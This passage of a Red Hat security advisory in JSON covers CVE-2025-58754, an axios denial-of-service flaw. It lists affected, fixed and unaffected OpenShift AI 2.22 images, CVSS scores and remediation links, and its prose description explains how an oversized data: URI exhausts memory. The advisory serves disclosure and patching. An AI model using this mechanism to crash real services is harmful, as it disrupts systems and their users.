"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
